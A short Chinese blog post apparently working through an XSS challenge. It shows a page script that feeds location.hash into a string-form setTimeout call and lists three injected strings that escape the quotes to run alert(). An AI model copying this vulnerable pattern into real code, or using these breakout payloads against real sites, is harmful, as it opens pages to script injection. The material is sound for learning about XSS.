标签:用法 val 利用 out time fun mil 源码 logs
今天P师傅发了一个XSS链接,让利用一下,源码如下
<script type="text/javascript"> var x=location.hash; function aa(x){}; setTimeout("aa(‘"+x+"‘)",100); </script>
然后看了下setTimeout这个函数,用法如下:
setTimeout(code,millisec)
| 参数 | 描述 |
|---|---|
| code | 必需。要调用的函数后要执行的 JavaScript 代码串。 |
| millisec | 必需。在执行代码前需等待的毫秒数。 |
带入函数可以成功执行的几个函数如下:
setTimeout("aa(‘‘,alert(1),‘‘)",1000);
setTimeout("aa(‘‘,alert(2))//‘)",1000);
setTimeout("aa(‘‘);alert(3);eval(‘‘)",1000);
标签:用法 val 利用 out time fun mil 源码 logs
原文地址:http://www.cnblogs.com/kuboy/p/7774864.html
